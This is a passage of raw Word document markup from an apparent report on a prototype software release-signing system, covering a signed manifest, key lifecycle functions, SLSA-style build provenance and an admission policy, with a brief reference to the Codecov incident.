          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "signature_algorithm": "Ed25519",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "signer": "Vendor Release Server",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "key_id": "vendor_primary_v1",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "timestamp": "2026-09-26T10:18:13.029775+00:00",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "provenance_ref": "uploader.sh.provenance.json",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "signature": "wyL0xP1WQ4z4jbvKV9Akcujf8Rlqp...QuAg=="</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Because one signature covers every field, an attacker cannot change the expected hash, relabel an old version as new, change the signer name or claim a different key without breaking the signature. The manifest therefore improves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>traceability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, since each deployed file maps to one version, key, signer and time. It also improves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>, because all checks are driven by one authenticated document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.6 Key Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760000" cy="1083564"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="key_lifecycle.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="1083564"/>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5.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Key lifecycle implemented by vendor/key_manager.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key management follows the lifecycle recommended in NIST SP 800-57 [16]: generation, protected storage, identification, trusted distribution of the public key, use, rotation and revocation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Key-management functions</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="4365"/>
        <w:gridCol w:w="2721"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implementation in the prototype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Production equivalent</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Generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>Ed25519PrivateKey.generate()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (OS CSPRNG) in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>generate_keypair(key_id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Generated inside an HSM / cloud KMS</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Private-key protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PKCS#8 PEM; encrypted with </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>BestAvailableEncryption</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> when a passphrase is supplied (the demo keys use none)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Non-exportable HSM/KMS key; access restricted by IAM, RBAC and MFA</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Public-key distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SubjectPublicKeyInfo PEM </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>keys/&lt;key_id&gt;_pub.pem</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the customer's trusted keystore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Published through a signed, authenticated channel</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Key identifiers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Human-readable </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>key_id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>vendor_primary_v1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) + SHA-256 fingerprint (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>compute_key_fingerprint</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Same</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Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>rotate_key(old, new)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">: new key pair generated, old key added to the CRL; the new key ID is added to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>allowed_key_ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Scheduled rotation with overlap period</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Revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>revoke_key(key_id, reason)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> appends key_id, reason and time to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t>keys/revoked_keys.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Signed CRL / status service</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Old-key invalidation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Signer refuses to sign with a revoked key (SIGNING_BLOCKED); verifier rejects its manifests (REVOKED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4365"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SIGN_RELEASE, SIGNING_BLOCKED and every verification outcome logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2721"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SIEM integration</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sz w:val="24"/>
        </w:rPr>
        <w:t>Why this matters for Codecov:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the credential leaked in the incident allowed writing to storage. Under our design, write access alone cannot produce a release that customers accept, because that requires the vendor's private signing key. If a signing key were leaked, adding it to the revocation list makes every manifest signed with it fail verification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.7 Build Provenance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>build.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> writes SLSA-style provenance [9], [10] next to the artifact: schema version, artifact name and version, artifact SHA-256, source repository, commit ID, build ID, build timestamp, builder identity, dependencies (name, version, hash) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>security_tests_passed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. The manifest references it by file name (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>provenance_ref</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">). The verifier loads it, and the admission policy requires that it exists, that the source repository is on the approved list, and that security tests passed. Stage 6 confirms that the provenance's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>artifact_sha256</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> equals the verified artifact digest; otherwise it returns PROVENANCE_MISMATCH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.8 Zero-Trust Admission Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Admission policy rules</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
